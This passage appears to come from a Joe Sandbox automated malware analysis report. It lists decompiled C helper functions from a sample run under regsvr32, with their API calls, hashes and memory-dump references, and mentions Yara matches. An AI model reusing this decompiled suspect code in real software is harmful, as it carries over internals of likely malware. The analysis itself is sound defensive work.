                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f934a7158a6da7c7e29ccab47129f5f1a645e83e67d5f42b9a9d94d3722861b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FF09072A01139EADF30A6768C49EEBB6ADDBC4710F000061FA17D60C0EB24CA5DCAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E7C61(void* __esi) {
                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                                    				memset(__esi, 0, 0x38);
                                                                                                                                                                                                                                    				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                    				 *(__esi + 0x1c) = _t8;
                                                                                                                                                                                                                                    				if(_t8 != 0) {
                                                                                                                                                                                                                                    					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                    					 *(__esi + 0x20) = _t10;
                                                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                                                    						CloseHandle( *(__esi + 0x1c));
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_v4 = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v4;
                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E7C6F
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76D681D0), ref: 023E7C84
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 023E7C91
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 023E7CA3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
• Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
• Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2812548120-0
                                                                                                                                                                                                                                    • Opcode ID: 6c28087cdf98e046076645a39d1f49bf6278756fc844495d12db26a368bd00b6
                                                                                                                                                                                                                                    • Instruction ID: 9bf174de2ce52cac79f660dda7918243919c346e821bebafb9415661c2b7db0f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c28087cdf98e046076645a39d1f49bf6278756fc844495d12db26a368bd00b6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0FEF5504308BFEB205F66DCC1C2BBBACFB852D9B11892EF04781581D632E81D8AB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D1850() {
                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t8 =  *0x26d4130;
                                                                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                    				 *0x26d413c = _t1;
                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                                                                    				if(_t3 != 5) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					if(_t12 <= 0) {
                                                                                                                                                                                                                                    						_t4 = 0x32;
                                                                                                                                                                                                                                    						return _t4;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t3 > 0) {
                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                    						 *0x26d412c = _t3;
                                                                                                                                                                                                                                    						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                    						 *0x26d4128 = _t5;
                                                                                                                                                                                                                                    						 *0x26d4130 = _t8;
                                                                                                                                                                                                                                    						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                    						 *0x26d4124 = _t6;
                                                                                                                                                                                                                                    						if(_t6 == 0) {
                                                                                                                                                                                                                                    							 *0x26d4124 =  *0x26d4124 | 0xffffffff;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t12 = _t3 - _t3;
                                                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,026D164B,76D263F0), ref: 026D185F
                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 026D186E
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 026D1885
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 026D189E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                    • Opcode ID: 00dd6d7f9787841c2404f7b2f322eb0ce83b9caf32b4adf96a19070ea9920b4d
                                                                                                                                                                                                                                    • Instruction ID: 32eed8dd1937b660845d881b42d7e21b3281eca972283f5ad7c1fe0f8b2f7d00
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00dd6d7f9787841c2404f7b2f322eb0ce83b9caf32b4adf96a19070ea9920b4d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4F04F71EC22189BE720DF68BD4A7AC3BA4E707712F405A95E548E62C4DBB048E18F59
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E970F() {
                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                    				intOrPtr _t5;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t1 =  *0x23ed26c; // 0x2cc
                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				SetEvent(_t1);
                                                                                                                                                                                                                                    				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					SleepEx(0x64, 1);
                                                                                                                                                                                                                                    					_t5 =  *0x23ed2b8; // 0x0
                                                                                                                                                                                                                                    					if(_t5 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                    					if(_t11 > 0) {
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t6 =  *0x23ed26c; // 0x2cc
                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t7 =  *0x23ed238; // 0x48d0000
                                                                                                                                                                                                                                    				if(_t7 != 0) {
                                                                                                                                                                                                                                    					HeapDestroy(_t7);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(000002CC,00000001,023E8099), ref: 023E971A
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 023E9729
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000002CC), ref: 023E974A
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32(048D0000), ref: 023E975A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4109453060-0
                                                                                                                                                                                                                                    • Opcode ID: 7364cde10573cb49cc87baed26b2762fcc34f67ed6d6e2566f9324d84ef78210
                                                                                                                                                                                                                                    • Instruction ID: 1c5ab5468343fb91441167e899d657c4081cc576b58fdefa2a077645eea0c6d4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7364cde10573cb49cc87baed26b2762fcc34f67ed6d6e2566f9324d84ef78210
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF058F0F95328CBDF30AE35A889B0A37ACAB00760F040E00E816DF2C0DB20E85C9650
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E023E75E9(void** __esi) {
                                                                                                                                                                                                                                    				char* _v0;
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				void** _t14;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t14 = __esi;
                                                                                                                                                                                                                                    				_t4 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t6 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t8 =  *_t14;
                                                                                                                                                                                                                                    				if(_t8 != 0 && _t8 != 0x23ed030) {
                                                                                                                                                                                                                                    					HeapFree( *0x23ed238, 0, _t8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t14[1] = E023E94A9(_v0, _t14);
                                                                                                                                                                                                                                    				_t11 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    				_t12 = _t11 + 0x40;
                                                                                                                                                                                                                                    				__imp__(_t12);
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023E75F2
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,023E23DE), ref: 023E75FC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,023E23DE), ref: 023E7624
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023E7640
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: f673feb2765994800bdb13b756f6582188f56fd4a846387ab1460cd1d26a0e40
                                                                                                                                                                                                                                    • Instruction ID: 3c8baf48fb9d2075702dad3ce71f03871afb53bc6bee7c34dc7d669a92ba3958
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f673feb2765994800bdb13b756f6582188f56fd4a846387ab1460cd1d26a0e40
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24F0B2B5A80251DBEE64DB69D849B1AB7ACAF14744F048C06F802DA2D1D760EC29CB25
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E023EA5D6() {
                                                                                                                                                                                                                                    				void* _v0;
                                                                                                                                                                                                                                    				void** _t3;
                                                                                                                                                                                                                                    				void** _t5;
                                                                                                                                                                                                                                    				void** _t7;
                                                                                                                                                                                                                                    				void** _t8;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t3 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t5 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t7 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    				_t10 =  *_t7;
                                                                                                                                                                                                                                    				if(_t10 != 0 && _t10 != 0x23ee836) {
                                                                                                                                                                                                                                    					HeapFree( *0x23ed238, 0, _t10);
                                                                                                                                                                                                                                    					_t7 =  *0x23ed32c; // 0x4cc95b0
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *_t7 = _v0;
                                                                                                                                                                                                                                    				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                    				__imp__(_t8);
                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(04CC9570), ref: 023EA5DF
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,023E23DE), ref: 023EA5E9
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,023E23DE), ref: 023EA617
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(04CC9570), ref: 023EA62C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: f0715879e969872cde5ddec3f7178232aa08243a4c169b4de00cf0dc98660b14
                                                                                                                                                                                                                                    • Instruction ID: 1d62519ca506c8fbf58ad09e1cc749a80206551e9cebacb6c49f9a1691c6a60d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0715879e969872cde5ddec3f7178232aa08243a4c169b4de00cf0dc98660b14
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF0B2F4A80100DBEF288B24E859B1977ACAB08701F04880AF802DF3D0C734EC28CA24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E023E7F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                    				int _t42;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t17 = __eax;
                                                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                                                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                    				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                    				_t28 = _t2;
                                                                                                                                                                                                                                    				_t34 = E023E2049(_t2);
                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                    					_t30 = E023E2049(_t28);
                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                    						E023E9039(_t34);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t39 = _a4;
                                                                                                                                                                                                                                    						_t22 = E023EA911(_t39);
                                                                                                                                                                                                                                    						_v8 = _t22;
                                                                                                                                                                                                                                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                    							_a4 = _t39;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t26 = _t22 + 2;
                                                                                                                                                                                                                                    							_a4 = _t22 + 2;
                                                                                                                                                                                                                                    							_t22 = E023EA911(_t26);
                                                                                                                                                                                                                                    							_v8 = _t22;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                    							__imp__(_t34, _a4);
                                                                                                                                                                                                                                    							 *_t30 = 0x2f;
                                                                                                                                                                                                                                    							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                    							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                    							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                    							__imp__(_t30, _v8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_a8 = _t34;
                                                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                                                    						 *_a12 = _t30;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?,?,00000000), ref: 023E7F33
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                      • Part of subcall function 023EA911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,023E7F61,00000000,00000001,00000001,?,?,023E15A4,?,?,?,?,00000102), ref: 023EA91F
                                                                                                                                                                                                                                      • Part of subcall function 023EA911: StrChrA.SHLWAPI(?,0000003F,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?,?,00000000,00000000), ref: 023EA929
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?), ref: 023E7F91
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023E7FA1
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023E7FAD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3767559652-0
                                                                                                                                                                                                                                    • Opcode ID: 707d983753915d948f24d1ccc60dc5a4d057bd0b267f59845251e07bffda1ab5
                                                                                                                                                                                                                                    • Instruction ID: 2e5107b4c4756b9223c6e4d1f4ec209a7617993e6412b0df5d3f398d31c75a2f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 707d983753915d948f24d1ccc60dc5a4d057bd0b267f59845251e07bffda1ab5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9721C072404329EBCF229FA5D844AAEBFAEAF05384F054055F8069B281D731CE19CBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E7CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                    				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                    				_t18 = E023E2049(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                    				_v8 = _t18;
                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                    					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                    					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                    					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004F0053,76D25520,?,00000008,04CC937C,?,023E747C,004F0053,04CC937C,?,?,?,?,?,?,023E6814), ref: 023E7CC8
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(023E747C,?,023E747C,004F0053,04CC937C,?,?,?,?,?,?,023E6814), ref: 023E7CCF
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,004F0053,76D269A0,?,?,023E747C,004F0053,04CC937C,?,?,?,?,?,?,023E6814), ref: 023E7CEF
                                                                                                                                                                                                                                    • memcpy.NTDLL(76D269A0,023E747C,00000002,00000000,004F0053,76D269A0,?,?,023E747C,004F0053,04CC937C), ref: 023E7D02
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2411391700-0
                                                                                                                                                                                                                                    • Opcode ID: 07ef3ee641482b9d072fc137f64c487aeaf8a5871510b8c7765b606bd7d05ff9
                                                                                                                                                                                                                                    • Instruction ID: ddc2ad882a95c94ad51294c27a2dd3ca62d3a1b81c048e0220bfeff5a055f78f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07ef3ee641482b9d072fc137f64c487aeaf8a5871510b8c7765b606bd7d05ff9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2F03C72900128BB8F21DFA9CC44CDF7BAEEF083547014062ED09D7151E631EA188BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(04CC87FA,00000000,00000000,73FCC740,023EA453,00000000), ref: 023E3CD8
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 023E3CE0
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,04CC87FA), ref: 023E3CF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 023E3CFF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
